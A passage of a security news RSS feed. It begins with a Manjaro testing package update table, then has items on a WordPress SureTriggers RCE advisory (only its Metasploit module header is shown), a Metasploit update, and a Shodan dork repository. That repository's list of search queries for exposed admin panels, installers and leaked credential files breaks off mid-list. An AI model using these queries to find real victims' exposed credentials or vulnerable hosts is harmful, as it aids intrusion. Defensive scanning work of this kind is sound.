   firefox-developer-edition-i18n-gl            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-gn            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-gu-in            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-he            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-hi-in            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-hr            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-hsb            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-hu            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-hy-am            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-ia            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-id            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-is            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-it            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-ja            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-ka            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-kab            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-kk            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-km            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-kn            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-ko            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-lij            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-lt            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-lv            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-mk            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-mr            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-ms            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-my            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-nb-no            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-ne-np            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-nl            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-nn-no            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-oc            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-pa-in            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-pl            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-pt-br            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-pt-pt            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-rm            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-ro            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-ru            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-sat            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-sc            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-sco            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-si            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-sk            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-skr            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-sl            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-son            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-sq            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-sr            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-sv-se            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-szl            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-ta            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-te            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-tg            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-th            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-tl            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-tr            139.0b8-1            139.0b9-1
  firefox-developer-edition-i18n-trs            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-uk            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-ur            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-uz            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-vi            139.0b8-1            139.0b9-1
   firefox-developer-edition-i18n-xh            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-zh-cn            139.0b8-1            139.0b9-1
firefox-developer-edition-i18n-zh-tw            139.0b8-1            139.0b9-1
               firefox-ublock-origin             1.63.2-2             1.64.0-1
                                 fop               2.10-1               2.11-1
                         frescobaldi              4.0.2-4              4.0.2-6
                       frugally-deep             0.16.2-1             0.18.1-1
                                  fx             36.0.1-1             36.0.2-2
                           gamescope             3.16.5-1             3.16.9-1
                            gammaray              3.1.0-7              3.2.0-2
                              gitlab            17.11.2-1             18.0.0-1
                       gitlab-gitaly            17.11.2-1             18.0.0-1
                       gitlab-runner            17.11.1-1             18.0.1-1
                        gnustep-base             1.30.0-3             1.31.1-1
                        gnustep-make              2.9.2-1              2.9.3-1
                               grcov              0.9.1-1             0.10.0-1
                              harper             0.35.0-1             0.36.0-1
                                haxe              4.3.6-1              4.3.7-1
                           headscale             0.25.1-1             0.26.0-1
                     jellyfin-ffmpeg          1:7.1.1p1-1          1:7.1.1p3-1
     kodi-addon-inputstream-adaptive            21.5.13-1            21.5.14-1
                              kotlin             2.1.20-1             2.1.21-1
                             kwallet             6.14.0-1             6.14.0-2
                            libdecor              0.2.2-1              0.2.3-1
                               libre             3.21.1-1             3.22.0-1
                                luau              0.673-1              0.674-1
                      matrix-synapse            1.128.0-1            1.129.0-1
                  mattermost-desktop             5.11.2-1             5.12.0-1
                          metasploit             6.4.63-1             6.4.64-1
                                neko              2.3.0-9              2.4.1-1
                              netpbm           10.86.46-2           10.86.46-3
                           nextcloud             31.0.4-1             31.0.5-1
                  nextcloud-app-mail              5.0.5-1              5.0.7-1
                              nodejs             23.9.0-1            23.11.1-1
                     nodejs-lts-iron            20.19.1-1            20.19.2-1
                      nodejs-lts-jod            22.14.0-2            22.15.1-1
                                occt            14.0.11-1            14.0.12-1
                              ollama              0.6.8-2              0.7.0-1
                         ollama-cuda              0.6.8-2              0.7.0-1
                         ollama-docs              0.6.8-2              0.7.0-1
                         ollama-rocm              0.6.8-2              0.7.0-1
                                onnx           1:1.17.0-5           1:1.18.0-1
                    openrazer-daemon             3.10.2-1             3.10.3-1
               openrazer-driver-dkms             3.10.2-1             3.10.3-1
                          opensearch             2.19.1-2             2.19.2-1
          opensearch-alerting-plugin           2.19.1.0-1           2.19.2.0-1
      opensearch-analysis-icu-plugin             2.19.1-2             2.19.2-1
 opensearch-analysis-kuromoji-plugin             2.19.1-2             2.19.2-1
     opensearch-analysis-nori-plugin             2.19.1-2             2.19.2-1
 opensearch-analysis-phonetic-plugin             2.19.1-2             2.19.2-1
  opensearch-analysis-smartcn-plugin             2.19.1-2             2.19.2-1
  opensearch-analysis-stempel-plugin             2.19.1-2             2.19.2-1
opensearch-analysis-ukrainian-plugin             2.19.1-2             2.19.2-1
 opensearch-anomaly-detection-plugin           2.19.1.0-1           2.19.2.0-1
opensearch-asynchronous-search-plugin          2.19.1.0-1           2.19.2.0-1
opensearch-cross-cluster-replication-plugin    2.19.1.0-1           2.19.2.0-1
               opensearch-dashboards             2.19.1-1             2.19.2-1
opensearch-dashboards-alerting-plugin          2.19.1.0-1           2.19.2.0-1
opensearch-dashboards-anomaly-detection-plugin 2.19.1.0-1           2.19.2.0-1
opensearch-dashboards-gantt-chart-plugin       2.19.1.0-1           2.19.2.0-1
opensearch-dashboards-index-management-plugin  2.19.1.0-1           2.19.2.0-1
   opensearch-dashboards-maps-plugin           2.19.1.0-1           2.19.2.0-1
opensearch-dashboards-notifications-plugin     2.19.1.0-1           2.19.2.0-1
opensearch-dashboards-observability-plugin     2.19.1.0-1           2.19.2.0-1
opensearch-dashboards-query-workbench-plugin   2.19.1.0-1           2.19.2.0-1
opensearch-dashboards-reports-plugin           2.19.1.0-1           2.19.2.0-1
opensearch-dashboards-security-plugin          2.19.1.0-1           2.19.2.0-1
opensearch-discovery-azure-classic-plugin        2.19.1-2             2.19.2-1
     opensearch-discovery-ec2-plugin             2.19.1-2             2.19.2-1
     opensearch-discovery-gce-plugin             2.19.1-2             2.19.2-1
        opensearch-geospatial-plugin           2.19.1.0-1           2.19.2.0-1
  opensearch-index-management-plugin           2.19.1.0-1           2.19.2.0-1
 opensearch-ingest-attachment-plugin             2.19.1-2             2.19.2-1
     opensearch-job-scheduler-plugin           2.19.1.0-1           2.19.2.0-1
               opensearch-knn-plugin           2.19.1.0-1           2.19.2.0-1
opensearch-mapper-annotated-text-plugin          2.19.1-2             2.19.2-1
    opensearch-mapper-murmur3-plugin             2.19.1-2             2.19.2-1
       opensearch-mapper-size-plugin             2.19.1-2             2.19.2-1
        opensearch-ml-commons-plugin           2.19.1.0-1           2.19.2.0-1
     opensearch-neural-search-plugin           2.19.1.0-1           2.19.2.0-1
     opensearch-notifications-plugin           2.19.1.0-1           2.19.2.0-1
     opensearch-observability-plugin           2.19.1.0-1           2.19.2.0-1
opensearch-performance-analyzer-plugin         2.19.1.0-1           2.19.2.0-1
 opensearch-reports-scheduler-plugin           2.19.1.0-1           2.19.2.0-1
  opensearch-repository-azure-plugin             2.19.1-2             2.19.2-1
    opensearch-repository-gcs-plugin             2.19.1-2             2.19.2-1
   opensearch-repository-hdfs-plugin             2.19.1-2             2.19.2-1
     opensearch-repository-s3-plugin             2.19.1-2             2.19.2-1
          opensearch-security-plugin           2.19.1.0-1           2.19.2.0-1
               opensearch-sql-plugin           2.19.1.0-1           2.19.2.0-1
         opensearch-store-smb-plugin             2.19.1-2             2.19.2-1
     opensearch-transport-nio-plugin             2.19.1-2             2.19.2-1
                 oxc-language-server            0.16.10-1            0.16.11-1
                              oxlint            0.16.10-1            0.16.11-1
            plasma-wayland-protocols             1.17.0-1             1.18.0-1
                                pnpm            10.10.0-1            10.11.0-1
                     pop-sound-theme  5.5.1.r7.g25ea85d-1  5.5.1.r7.g25ea85d-2
                              pulumi            3.169.0-1            3.170.0-1
                         python-onnx           1:1.17.0-5           1:1.18.0-1
                    python-openrazer             3.10.2-1             3.10.3-1
                       python-pycurl             7.45.4-1             7.45.6-1
                    python-pysequoia             0.1.27-1             0.1.28-1
                      python-pytorch              2.7.0-4              2.7.0-5
                 python-pytorch-cuda              2.7.0-4              2.7.0-5
                  python-pytorch-opt              2.7.0-4              2.7.0-5
             python-pytorch-opt-cuda              2.7.0-4              2.7.0-5
             python-pytorch-opt-rocm              2.7.0-4              2.7.0-5
                 python-pytorch-rocm              2.7.0-4              2.7.0-5
                         python-ruff             0.11.9-1            0.11.10-1
                           python-uv              0.7.3-1              0.7.4-1
                   rebels-in-the-sky             1.0.29-1             1.0.30-1
                                 rio             0.2.15-1             0.2.16-1
                                ruff             0.11.9-1            0.11.10-1
                       rust-analyzer           20250505-1           20250512-1
                              screen              5.0.1-1              5.0.1-2
                                sdl3             3.2.12-1             3.2.14-1
                               smlnj         110.99.7.1-1           110.99.8-1
                               spice             0.15.2-1             0.16.0-1
                          strawberry             1.2.10-1             1.2.11-1
              svelte-language-server            0.17.13-1            0.17.14-1
                           syncthing             1.29.6-1             1.29.6-2
                  syncthing-discosrv             1.29.6-1             1.29.6-2
                  syncthing-relaysrv             1.29.6-1             1.29.6-2
                           talhelper             3.0.23-1             3.0.24-1
                         thunderbird              138.0-1            138.0.1-1
             thunderbird-dark-reader            4.9.105-1            4.9.106-1
                 thunderbird-i18n-af              138.0-1            138.0.1-1
                 thunderbird-i18n-ar              138.0-1            138.0.1-1
                thunderbird-i18n-ast              138.0-1            138.0.1-1
                 thunderbird-i18n-be              138.0-1            138.0.1-1
                 thunderbird-i18n-bg              138.0-1            138.0.1-1
                 thunderbird-i18n-br              138.0-1            138.0.1-1
                 thunderbird-i18n-ca              138.0-1            138.0.1-1
                thunderbird-i18n-cak              138.0-1            138.0.1-1
                 thunderbird-i18n-cs              138.0-1            138.0.1-1
                 thunderbird-i18n-cy              138.0-1            138.0.1-1
                 thunderbird-i18n-da              138.0-1            138.0.1-1
                 thunderbird-i18n-de              138.0-1            138.0.1-1
                thunderbird-i18n-dsb              138.0-1            138.0.1-1
                 thunderbird-i18n-el              138.0-1            138.0.1-1
              thunderbird-i18n-en-gb              138.0-1            138.0.1-1
              thunderbird-i18n-en-us              138.0-1            138.0.1-1
              thunderbird-i18n-es-ar              138.0-1            138.0.1-1
              thunderbird-i18n-es-es              138.0-1            138.0.1-1
                 thunderbird-i18n-et              138.0-1            138.0.1-1
                 thunderbird-i18n-eu              138.0-1            138.0.1-1
                 thunderbird-i18n-fi              138.0-1            138.0.1-1
                 thunderbird-i18n-fr              138.0-1            138.0.1-1
              thunderbird-i18n-fy-nl              138.0-1            138.0.1-1
              thunderbird-i18n-ga-ie              138.0-1            138.0.1-1
                 thunderbird-i18n-gd              138.0-1            138.0.1-1
                 thunderbird-i18n-gl              138.0-1            138.0.1-1
                 thunderbird-i18n-he              138.0-1            138.0.1-1
                 thunderbird-i18n-hr              138.0-1            138.0.1-1
                thunderbird-i18n-hsb              138.0-1            138.0.1-1
                 thunderbird-i18n-hu              138.0-1            138.0.1-1
              thunderbird-i18n-hy-am              138.0-1            138.0.1-1
                 thunderbird-i18n-id              138.0-1            138.0.1-1
                 thunderbird-i18n-is              138.0-1            138.0.1-1
                 thunderbird-i18n-it              138.0-1            138.0.1-1
                 thunderbird-i18n-ja              138.0-1            138.0.1-1
                 thunderbird-i18n-ka              138.0-1            138.0.1-1
                thunderbird-i18n-kab              138.0-1            138.0.1-1
                 thunderbird-i18n-kk              138.0-1            138.0.1-1
                 thunderbird-i18n-ko              138.0-1            138.0.1-1
                 thunderbird-i18n-lt              138.0-1            138.0.1-1
                 thunderbird-i18n-ms              138.0-1            138.0.1-1
              thunderbird-i18n-nb-no              138.0-1            138.0.1-1
                 thunderbird-i18n-nl              138.0-1            138.0.1-1
              thunderbird-i18n-nn-no              138.0-1            138.0.1-1
              thunderbird-i18n-pa-in              138.0-1            138.0.1-1
                 thunderbird-i18n-pl              138.0-1            138.0.1-1
              thunderbird-i18n-pt-br              138.0-1            138.0.1-1
              thunderbird-i18n-pt-pt              138.0-1            138.0.1-1
                 thunderbird-i18n-rm              138.0-1            138.0.1-1
                 thunderbird-i18n-ro              138.0-1            138.0.1-1
                 thunderbird-i18n-ru              138.0-1            138.0.1-1
                 thunderbird-i18n-sk              138.0-1            138.0.1-1
                 thunderbird-i18n-sl              138.0-1            138.0.1-1
                 thunderbird-i18n-sq              138.0-1            138.0.1-1
                 thunderbird-i18n-sr              138.0-1            138.0.1-1
              thunderbird-i18n-sv-se              138.0-1            138.0.1-1
                 thunderbird-i18n-th              138.0-1            138.0.1-1
                 thunderbird-i18n-tr              138.0-1            138.0.1-1
                 thunderbird-i18n-uk              138.0-1            138.0.1-1
                 thunderbird-i18n-uz              138.0-1            138.0.1-1
                 thunderbird-i18n-vi              138.0-1            138.0.1-1
              thunderbird-i18n-zh-cn              138.0-1            138.0.1-1
              thunderbird-i18n-zh-tw              138.0-1            138.0.1-1
           thunderbird-ublock-origin             1.63.2-2             1.64.0-1
                         timescaledb             2.19.3-1             2.20.0-1
             timescaledb-old-upgrade             2.19.3-1             2.20.0-1
                               totem43.1+r37+gea6718427-143.1+r44+gbf65cd39c-1
            typescript-svelte-plugin             0.3.46-1             0.3.47-1
                       ublock-origin             1.63.2-2             1.64.0-1
                               ugrep              7.4.2-1              7.4.3-1
                          unarchiver             1.10.8-4             1.10.8-5
                          unrealircd            6.1.9.1-1             6.1.10-1
                            upmpdcli              1.9.3-2              1.9.5-2
                                  uv              0.7.3-1              0.7.4-1
                            wallabag             2.6.10-2             2.6.12-1
                             wikiman               2.14-1             2.14.1-1
                  xdg-desktop-portal             1.20.0-2             1.20.1-1
                                 zed            0.186.8-1            0.186.9-1
                          pgbackrest                    -             2.55.1-1


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20250515             20250517
-------------------------------------------------------------------------------
                        lib32-json-c               0.18-1               0.18-2
                          lib32-sdl3             3.2.12-1             3.2.14-1

</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2025-05-17-kernel-6-15-rc6-gitlab-thunderbird/178044/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2025-05-17-kernel-6-15-rc6-gitlab-thunderbird/178044">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WordPress SureTriggers 1.0.78 Authentication Bypass / Remote Code Execution]]></title>
<description><![CDATA[Topic: WordPress SureTriggers 1.0.78 Authentication Bypass / Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/2778999/sicherheitsluecken/wordpress-suretriggers-1078-authentication-bypass-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2778999/sicherheitsluecken/wordpress-suretriggers-1078-authentication-bypass-remote-code-execution/</guid>
<pubDate>Thu, 15 May 2025 22:35:27 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: WordPress SureTriggers 1.0.78 Authentication Bypass / Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Update Adds Erlang/OTP SSH Exploit and OPNSense Scanner]]></title>
<description><![CDATA[The open-source penetration testing toolkit Metasploit has unveiled a major update, introducing four new modules, including a highly anticipated exploit targeting Erlang/OTP SSH servers and a scanner for OPNSense firewalls. The release also enhances diagnostic tools and addresses critical bugs, s...]]></description>
<link>https://tsecurity.de/de/2770852/hacking/metasploit-update-adds-erlangotp-ssh-exploit-and-opnsense-scanner/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2770852/hacking/metasploit-update-adds-erlangotp-ssh-exploit-and-opnsense-scanner/</guid>
<pubDate>Mon, 12 May 2025 13:04:30 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The open-source penetration testing toolkit Metasploit has unveiled a major update, introducing four new modules, including a highly anticipated exploit targeting Erlang/OTP SSH servers and a scanner for OPNSense firewalls. The release also enhances diagnostic tools and addresses critical bugs, solidifying its role as a cornerstone for security professionals, as per a report by Rapid7. […]</p>
<p>The post <a href="https://gbhackers.com/metasploit-update-erlang-opnsense-scanner/">Metasploit Update Adds Erlang/OTP SSH Exploit and OPNSense Scanner</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Shodan-Dorks - Dorks for Shodan; a powerful tool used to search for Internet-connected devices]]></title>
<description><![CDATA[This GitHub repository provides a range of search queries, known as "dorks," for Shodan, a powerful tool used to search for Internet-connected devices. The dorks are designed to help security researchers discover potential vulnerabilities and configuration issues in various types of devices such ...]]></description>
<link>https://tsecurity.de/de/2769397/it-security-tools/shodan-dorks-dorks-for-shodan-a-powerful-tool-used-to-search-for-internet-connected-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2769397/it-security-tools/shodan-dorks-dorks-for-shodan-a-powerful-tool-used-to-search-for-internet-connected-devices/</guid>
<pubDate>Sun, 11 May 2025 15:33:40 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="separator"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj_CyaABeyGjA0Ll_8pZtRLfDgAp-WXQ_Ds-AMmavEo0GqpCzF1LlqyvutvjapUNIVeCL7WY2f8eXU67JktzZ5jecdY14eWUvMXfYCTQdwHU8Pl-DFb41HL1nrVr8YCsh6UYjSY6TJH7jXLdoGQ2QdE4ZY734fzyJzrfWEI1pSc81Qv0OpdITrVRpEgYJU"><img alt="" data-original-height="662" data-original-width="1183" height="358" src="https://blogger.googleusercontent.com/img/a/AVvXsEj_CyaABeyGjA0Ll_8pZtRLfDgAp-WXQ_Ds-AMmavEo0GqpCzF1LlqyvutvjapUNIVeCL7WY2f8eXU67JktzZ5jecdY14eWUvMXfYCTQdwHU8Pl-DFb41HL1nrVr8YCsh6UYjSY6TJH7jXLdoGQ2QdE4ZY734fzyJzrfWEI1pSc81Qv0OpdITrVRpEgYJU=w640-h358" width="640"></a></div><br> <p>This GitHub repository provides a range of search queries, known as "dorks," for Shodan, a powerful tool used to search for Internet-connected devices. The dorks are designed to help security researchers discover potential <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> and <a href="https://www.kitploit.com/search/label/Configuration" target="_blank" title="configuration">configuration</a> issues in various types of devices such as webcams, routers, and servers. This resource is helpful for those interested in exploring network security and conducting <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="vulnerability">vulnerability</a> scanning, including both beginners and experienced information security professionals. By leveraging this repository, users can improve the security of their own networks and protect against potential attacks.</p> <span><a name="more"></a></span><p><br></p><h3> Shodan Dorks: </h3> <pre><code><br>aa3939fc357723135870d5036b12a67097b03309<br>app="HIKVISION-综合安防管理平台"<br>"AppleHttpServer"<br>"AutobahnPython"<br>basic realm="Kettle"<br>Bullwark<br>cassandra<br>Chromecast<br>"ClickShareSession"<br>"/config/log_off_page.htm"<br>'"connection: upgrade"'<br>"cowboy"<br>cpe:"cpe:2.3:a:apache:cassandra"<br>cpe:"cpe:2.3:a:backdropcms:backdrop"<br>cpe:"cpe:2.3:a:bolt:bolt"<br>cpe:"cpe:2.3:a:cisco:sd-wan"<br>cpe:"cpe:2.3:a:ckeditor:ckeditor"<br>cpe:"cpe:2.3:a:cmsimple:cmsimple"<br>cpe:"cpe:2.3:a:djangoproject:django"<br>cpe:"cpe:2.3:a:djangoproject:django" || http.title:"Django administration"<br>cpe:"cpe:2.3:a:eclipse:jetty"<br>cpe:"cpe:2.3:a:embedthis:appweb"<br>cpe:"cpe:2.3:a:embedthis:goahead"<br>cpe:"cpe:2.3:a:exim:exim"<br>cpe:"cpe:2.3:a:gitlist:gitlist"<br>cpe:"cpe:2.3:a:google:web_server"<br>cpe:"cpe:2.3:a:jfrog:artifactory"<br>cpe:"cpe:2.3:a:kentico:kentico"<br>cpe:"cpe:2.3:a:koha:koha"<br>cpe:"cpe:2.3:a:konghq:docker-kong"<br>cpe:"cpe:2.3:a:laurent_destailleur:awstats"<br>cpe:"cpe:2.3:a:lighttpd:lighttpd"<br>cpe:"cpe:2.3:a:microsoft:internet_information_server"<br>cpe:"cpe:2.3:a:modx:modx_revolution"<br>cpe:"cpe:2.3:a:nodebb:nodebb"<br>cpe:"cpe:2.3:a:nodejs:node.js"<br>cpe:"cpe:2.3:a:openvpn:openvpn_access_server"<br>cpe:"cpe:2.3:a:openwebanalytics:open_web_analytics"<br>cpe:"cpe:2.3:a:oracle:glassfish_server"<br>cpe:"cpe:2.3:a:oracle:iplanet_web_server"<br>cpe:"cpe:2.3:a:php:php"<br>cpe:"cpe:2.3:a:prestashop:prestashop"<br>cpe:"cpe:2.3:a:proftpd:proftpd"<br>cpe:"cpe:2.3:a:public_knowledge_project:open_journal_systems"<br>cpe:"cpe:2.3:a:pulsesecure:pulse_connect_secure"<br>cpe:"cpe:2.3:a:rubyonrails:rails"<br>cpe:"cpe:2.3:a:sensiolabs:symfony"<br>cpe:"cpe:2.3:a:typo3:typo3"<br>cpe:"cpe:2.3:a:vmware:rabbitmq"<br>cpe:"cpe:2.3:a:webedition:webedition_cms"<br>cpe:"cpe:2.3:a:zend:zend_server"<br>cpe:"cpe:2.3:h:zte:f460"<br>cpe:"cpe:2.3:o:canonical:ubuntu_linux"<br>cpe:"cpe:2.3:o:fedoraproject:fedora"<br>cpe:"cpe:2.3:o:microsoft:windows"<br>"DIR-845L"<br>eBridge_JSessionid<br>'ecology_JSessionid'<br>ecology_JSessionid<br>elastic indices<br>"ElasticSearch"<br>ESMTP<br>/geoserver/<br>Graylog<br>'hash:1357418825'<br>html:"access_tokens.db"<br>html:"ACE 4710 Device Manager"<br>html:"ActiveCollab Installer"<br>html:"Administration - Installation - MantisBT"<br>html:"Satis"<br>html:"Akeeba Backup"<br>html:"Amazon EC2 Status"<br>html:"anonymous-cli-metrics.json"<br>html:"ANTEEO"<br>html:"anyproxy"<br>html:"Apache Tomcat"<br>html:"Apdisk"<br>html:"appveyor.yml"<br>html:"aquatronica"<br>html:"Argo CD"<br>html:"Ariang"<br>html:"ASPNETCORE_ENVIRONMENT"<br>html:"atlassian-connect.json"<br>html:"atomcms"<br>html:"auth.json"<br>html:"authorization token is empty"<br>html:"Avaya Aura"<br>html:"AVideo"<br>html:"AWS EC2 Auto Scaling Lab"<br>html:"azure-pipelines.yml"<br>html:"babel.config.js"<br>html:"behat.yml"<br>html:"BeyondTrust"<br>html:"BIG-IP APM"<br>html:"BIG-IP Configuration Utility"<br>html:"bitbucket-pipelines.yml"<br>"html:\"/bitrix/\""<br>html:"blazor.boot.json"<br>html:"Blesta installer"<br>html:"blob.core.windows.net"<br>html:"buildAssetsDir" "nuxt"<br>html:"Calibre"<br>html:"camaleon_cms"<br>html:"Cargo.lock"<br>html:"Cargo.toml"<br>html:"CasaOS"<br>html:"Cassia Bluetooth Gateway Management Platform"<br>html:"/certenroll"<br>html:"/cfadmin/img/"<br>html:"Change Detection"<br>html:"Cisco Expressway"<br>html:"cisco firepower management"<br>html:"Cisco Unity Connection"<br>html:"/citrix/xenapp"<br>html:"ckan 2.8.2" || html:"ckan 2.3"<br>html:"cloud-config.yml"<br>html:"CMS Made Simple Install/Upgrade"<br>html:"codeception.yml"<br>html:"CodeMeter"<br>html:"CodiMD"<br>html:"config.rb"<br>html:"config.ru"<br>html:'content="eArcu'<br>html:"content="Navidrome""<br>html:"ContentPanel SetupWizard"<br>html:"contexts known to this"<br>html:"Coolify" html:"register"<br>html:"Couchbase Sync Gateway"<br>html:"Cox Business"<br>html:"credentials.db"<br>html:"Crontab UI"<br>html:"CrushFTP"<br>html:"cyberpanel"<br>html:"CyberPanel"<br>html:"DashRenderer"<br>html:"Dataease"<br>html:"data-xwiki-reference"<br>"html=\"Decision Center Enterprise console\""<br>html:"Decision Center Enterprise console"<br>html:"DefectDojo Logo"<br>html:"def_wirelesspassword"<br>html:"Dell OpenManage Switch Administrator"<br>'html:"desktop.ini"'<br>html:"DSR-250"<br>html:"DXR.axd"<br>html:"Easy Installer by ViserLab"<br>html:"editorconfig"<br>html:"EJBCA Enterprise Cloud Configuration Wizard"<br>html:"engage - Portail soignant"<br>html:"epihash"<br>html:"eShop Installer"<br>html:"ETL3100"<br>html:"FacturaScripts installer"<br>html:"faradayApp"<br>html:"Femtocell Access Point"<br>html:"FileCatalyst file transfer solution"<br>html:"FleetCart"<br>html:"FleetCart - Installation"<br>html:"Forgejo"<br>html:"FortiPortal"<br>html:"F-Secure Policy Manager"<br>html:ftpconfig<br>html:"ganglia_form.submit()"<br>html:"Generated by The Webalizer"<br>html:"GeniusOcean Installer"<br>html:"gitlab-ci.yml"<br>html:"GitLab Enterprise Edition"<br>html:"git web interface version"<br>html:"go.mod"<br>html:"gradio_mode"<br>html:"Guardfile"<br>html:"HAL Management Console"<br>html:"hgignore"<br>html:"Home - CUPS"<br>html:"HomeWorks Illumination Web Keypad"<br>html:"Honeywell Building Control"<br>html:"https://hugegraph.github.io"<br>html:"human.aspx"<br>html:"ibmdojo"<br>html:"iClock Automatic"<br>html:"IDP Skills Installer"<br>html:"imgproxy"<br>html:"Installation" html:"itop"<br>html:"Installation Panel"<br>html:"Installer - GROWI"<br>html:"Install Flarum"<br>html:"Install - StackPosts"<br>html:"Install the script - JustFans"<br>html:"instance_metadata"<br>html:"Invicti Enterprise - Installation Wizard"<br>html:"Invoice Ninja Setup"<br>html:"JBossWS"<br>html:"JK Status Manager"<br>html:"jsconfig.json"<br>html:"jwks.json"<br>html:"karma.conf.js"<br>html:"Kemp Login Screen"<br>html:"LANCOM Systems GmbH"<br>html:"Laragon" html:"phpinfo"<br>html:"lesshst"<br>html:"LibreNMS Install"<br>html:"Limesurvey Installer"<br>html:"LMSZAI - Learning Management System"<br>html:"LoadMaster"<br>html:"Locklizard Web Viewer"<br>html:"Login - Jorani"<br>html:"Login - Netflow Analyzer"<br>html:"Login | Splunk"<br>html:"Logon Error Message"<br>html:"logstash"<br>"html:\"Lucee\""<br>html:"Lychee-installer"<br>html:"Magento Installation"<br>html:"Magnolia is a registered trademark"<br>html:mailmap<br>html:"manifest.json"<br>html:"MasterSAM"<br>html:"Mautic Installation"<br>html:"mempool-space" || title:"Signet Explorer"<br>html:"Mercurial repositories index"<br>html:"mongod"<br>html:"mooSocial Installation"<br>html:"mysql_history"<br>html:"/_next/static"<br>html:"NGINX+ Dashboard"<br>html:"Nginx Proxy Manager"<br>html:"nginxWebUI"<br>html:"ng-version="<br>html:"nopCommerce Installation"<br>html:"npm-debug.log"<br>html:"npm-shrinkwrap.json"<br>html:"Ocp-Apim-Subscription-Key"<br>html:"omniapp"<br>html:"onedev.io"<br>html:"Open Journal Systems"<br>html:"Orbit Telephone System"<br>html:"Orchard Setup - Get Started"<br>html:"osCommerce"<br>html:"OWA CONFIG SETTINGS"<br>html:"owncast"<br>html:"packages.config"<br>html:"parameters.yml"<br>html:"PDI 